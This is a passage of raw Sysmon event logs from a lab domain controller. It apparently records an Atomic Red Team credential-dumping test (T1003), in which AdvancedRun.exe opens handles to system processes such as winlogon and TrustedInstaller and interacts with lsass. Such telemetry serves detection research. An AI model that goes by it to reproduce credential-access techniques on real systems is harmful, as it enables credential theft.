17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003980089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003980088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003980085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003980084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 